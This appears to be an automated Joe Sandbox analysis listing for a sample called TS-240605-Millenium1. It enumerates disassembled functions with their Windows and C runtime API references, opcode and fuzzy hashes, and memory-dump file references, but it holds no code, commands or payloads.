Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
Instruction ID: 6ce6702cdc9e642873ad9904c3cf1047a247b18862d8f1fa554f061aeac966fe
Opcode Fuzzy Hash: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
Instruction Fuzzy Hash: A1B1D622B18A9641EE619F6196001B963B0EF66BE5F445533FECDA7B89DF3CE841D300

Function 00007FF6CEB2C7A0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6CEB2C7CC
GetCurrentThreadId.KERNEL32 ref: 00007FF6CEB2C7DA
GetCurrentProcessId.KERNEL32 ref: 00007FF6CEB2C7E6
QueryPerformanceCounter.KERNEL32 ref: 00007FF6CEB2C7F6

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
Instruction ID: d159937443e00417c9626a17170f4fb63e99da4281bd446557b6e83bfad85088
Opcode Fuzzy Hash: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
Instruction Fuzzy Hash: AE115122B14F028AEB00CF60E9452B933B4FB69B59F041E31EA6D97764DF7CE1548740

Function 00007FF6CEB44A60 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6CEB44AC6
memcpy_s.LIBCPMT ref: 00007FF6CEB44AF1

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 63131bac5d9e93a880af3b84359398440c08202a144bb1f85ea126081af42d4f
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 8EC10472B186C687E724CF15A24467AB7A1F7A5785F048136EB8AA3B44DF3DE811CB00

Function 00007FF6CEB4A7D8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6CEB4AA27
RaiseException.KERNEL32 ref: 00007FF6CEB4AA38

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 107d115b060fbd35a116a220a90c3f58689526778be32960ff8b0eb29206904d
Instruction ID: 4ee925ed15110da44231ad9f4649ecd33fc76bccc91d5b769151dcd66536c7a9
Opcode Fuzzy Hash: 107d115b060fbd35a116a220a90c3f58689526778be32960ff8b0eb29206904d
Instruction Fuzzy Hash: 90B16973A04B898AEB15CF29C9863687BF0F755B48F158822EBAD937A4DF39D451C700

Function 00007FF6CEB342D4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6CEB34684
, xrefs: 00007FF6CEB34442

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: a4155c6fffaecf52a824239c2b6f37dbc1b24f1087258a4a4fa2a9ab421e67c4
Instruction ID: 23d4479a43e955f48a4ca7bbdf188cc20290b79a301d5fe5f23feccf4f1ce6d5
Opcode Fuzzy Hash: a4155c6fffaecf52a824239c2b6f37dbc1b24f1087258a4a4fa2a9ab421e67c4
Instruction Fuzzy Hash: 67E1CA3690868283EB688F15835217DB3B1FF67B49F241235EA8EA7794DF39E851C740

Function 00007FF6CEB3ECA0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF6CEB3EDAD
gfff, xrefs: 00007FF6CEB3EE2A

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: b0eb00ec9cc72bcbd25ebaa9050c7cd18c6ed420f4824bc0d073d86035fcaeec
Instruction ID: 9117c8426b81c7cabe5cd38bc9cd0f237ab76422c5b1d82577533818fd59dbe4
Opcode Fuzzy Hash: b0eb00ec9cc72bcbd25ebaa9050c7cd18c6ed420f4824bc0d073d86035fcaeec
Instruction Fuzzy Hash: B1517A22B183D143E7208E35AA027796BA1E765B91F489233FBEC97AC5CF3DE4008700

Function 00007FF6CEB3E80C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6CEB3EB4E

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: ce984bed762576d5ac079d260fe98dbb5d2c0c9497d8241e3c95b971abe0b5e7
Instruction ID: 374a372b1b2e75e32dfc40fe65340236dc6baf18dd20bb93389e7896514f460c
Opcode Fuzzy Hash: ce984bed762576d5ac079d260fe98dbb5d2c0c9497d8241e3c95b971abe0b5e7
Instruction Fuzzy Hash: 57A14562A087C687EB21CF25A5417B97BA1AB66B84F048132FBCD97781EE3DE501C701

Function 00007FF6CEB38EF4 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF6CEB38F13

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 78de1512b9aaf0fe835626b1baf1273ddb3abd7b45f485034b213d1c96ec7de6
Instruction ID: b06e42ed6caa8caf37c8596f216bfe9f9bd036007b5fa13b3d35ec53dfa3e06e
Opcode Fuzzy Hash: 78de1512b9aaf0fe835626b1baf1273ddb3abd7b45f485034b213d1c96ec7de6
Instruction Fuzzy Hash: 8C51B615F0870792FA54AF269B0217A52B1AF76B86F085435FECDE77DAEE3CE4424200

Function 00007FF6CEB442D0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6CEB442D4

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: ed995d9d252c3e0c61107ed1ba5c48f1392176915e7fcf845d28b2722b2e2d45
Instruction ID: 7216a0146f8ffde7a57e77e6e7ed89b2c678b94441fa1d7f6e3c009b08c3a82e
Opcode Fuzzy Hash: ed995d9d252c3e0c61107ed1ba5c48f1392176915e7fcf845d28b2722b2e2d45
Instruction Fuzzy Hash: 09B09220E07A02C6FA082F116D8222422B87F69B12F944039D08DE1320DE2C20A58B01

Function 00007FF6CEB33ED0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9df69fd1c27fd416770dca946a20fccf44885df857cf64186a4c680355c85b
Instruction ID: eecf8469c0293f3f6d45a31a9f02222559afdb1def792c176e362cb6326df46b
Opcode Fuzzy Hash: ca9df69fd1c27fd416770dca946a20fccf44885df857cf64186a4c680355c85b
Instruction Fuzzy Hash: D5D1E826A0868387EB68CF25874223D67B0EF67B49F140235EE9DA7695CF3DE845C740

Function 00007FF6CEB292D0 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6d76246942c46f132312ebc4a4bc27c309f6729675ee6fb805fd22939f347a0
Instruction ID: 72be6be9f17d5c19523c0019396f2384ac28e63da828ecea776564cf7a8f77c4
Opcode Fuzzy Hash: a6d76246942c46f132312ebc4a4bc27c309f6729675ee6fb805fd22939f347a0
Instruction Fuzzy Hash: 93C1C4722141E14BD2C9EB29E56957A37E1FB9934EBC4403AEBCB47B8AC63CE014D710

Function 00007FF6CEB33540 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa501f5897fa8170c1c3089a9165536d111e8d2735d862654f88cabfcab8bd87
Instruction ID: 676f0b6b05e2d7fbe08c026ac2b5bd895249b7e7749a8f6a6a342ac14ae637b5
Opcode Fuzzy Hash: fa501f5897fa8170c1c3089a9165536d111e8d2735d862654f88cabfcab8bd87
Instruction Fuzzy Hash: 1DB1AF72A0C7858AE7658F29C15113E3BB0EB26F49F244135EB9E97795CF39D841C740

Function 00007FF6CEB3F320 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b387bb0edac5d3a7572aaf71fcdce3ba0ac9d1c4353072e234eccf42a557
Instruction ID: feb1359d92911b8514966b38d26d85064b8745c5ba81e97327f956dfb898bb09
Opcode Fuzzy Hash: dde3b387bb0edac5d3a7572aaf71fcdce3ba0ac9d1c4353072e234eccf42a557
Instruction Fuzzy Hash: 1D81D572A0C78147E774CF19A6433B9A6A1FB56794F144235FACD93B99CE3CD4008B00

Function 00007FF6CEB47550 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 56d2f3263a1741f87de1d3959ce665dc908e505345c087bc705cf795706c1100
Instruction ID: 8aa820ac97cdc7256088a3eb6786d6180913187b08827cbf28d578e9276c517a
Opcode Fuzzy Hash: 56d2f3263a1741f87de1d3959ce665dc908e505345c087bc705cf795706c1100
Instruction Fuzzy Hash: EB612A22E183A246F7648E6C865427966B2AF62361F540A3AF7DDD76D4DE7CE900CF00

Function 00007FF6CEB32684 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a7def00a57181835e1b5755574f212d41c435eb46ac8bcc91c00ca4f50edce3
Instruction ID: ac9164782f815f7dc46635b5ca3a4eb5a5da4fe224df42686c829db3aacad217
Opcode Fuzzy Hash: 0a7def00a57181835e1b5755574f212d41c435eb46ac8bcc91c00ca4f50edce3
Instruction Fuzzy Hash: 9F514F76A18A5187E7258F29C14623827B0FB66B69F244131EE8DA7795CF3AEC42C740

Function 00007FF6CEB32A94 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 431273df7c005eff8b086499786a7f8af66af839407972891033f6f8b32510fa
Instruction ID: 6c5eeeb50477ec2a82be9eef9dee7ec93ba55765db5187fddfa2bf4e83d5c90d
Opcode Fuzzy Hash: 431273df7c005eff8b086499786a7f8af66af839407972891033f6f8b32510fa
Instruction Fuzzy Hash: 43516136A18E5187E7248F29C14523933B4EB66F69F244131EACDA7794DF3AE843D780

Function 00007FF6CEB32274 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3986d2e28db3ad4c814196551e744b7f12e089580c78501851383343d29f5119
Instruction ID: 89907cd968e3827ddeb2954a292e7872d1815b3e389021c53c31c5fef620a7aa
Opcode Fuzzy Hash: 3986d2e28db3ad4c814196551e744b7f12e089580c78501851383343d29f5119
Instruction Fuzzy Hash: AF519476A18A5187E7248F29D64123873B0EB66F59F244131EECDA77A4CF3AE843C740

Function 00007FF6CEB32890 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56eab1984f79c1160248cb97b5e30aec2666dd062f10dae5dc3084fdbc1595d5
Instruction ID: 29a5a111b76a0d03716985ce70d417c58b17b338ac3bc950b36224edef2af3e6
Opcode Fuzzy Hash: 56eab1984f79c1160248cb97b5e30aec2666dd062f10dae5dc3084fdbc1595d5
Instruction Fuzzy Hash: 86517636A18A5587E7358F29D14123837B1EB66F59F244131EECCA7798CF3AE842C780

Function 00007FF6CEB32070 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a792dd5f357ba9ab053cb868b8428acf2d0115ad083e523ed5123ef832f09c
Instruction ID: e6dae09c184d49e3fbf3d81b887572f33529a1ee75b1df429a9492cb58d5b98e
Opcode Fuzzy Hash: e4a792dd5f357ba9ab053cb868b8428acf2d0115ad083e523ed5123ef832f09c
Instruction Fuzzy Hash: E7518736A18E5287E7348F29D64123837B1EB66B59F244131EE8CA7795CF3AE853C740

Function 00007FF6CEB32480 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b37b721d2520797c932084b48cf8e5c5b4bbfd8b4955e3aae9fbd8879836657
Instruction ID: a39a3015604e98dcdbc1932061225712f72c2153624b1aa779df4d1f56d50b5b
Opcode Fuzzy Hash: 5b37b721d2520797c932084b48cf8e5c5b4bbfd8b4955e3aae9fbd8879836657
Instruction Fuzzy Hash: A951B536A18A5187E7248F29C15123837B0EB66F59F354131EE8CA77A4DF3AE943C740

Function 00007FF6CEB36750 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 319fc977ef92ccd2288a1cfeea822eafa777ea3df61446613ea91709bb13806e
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
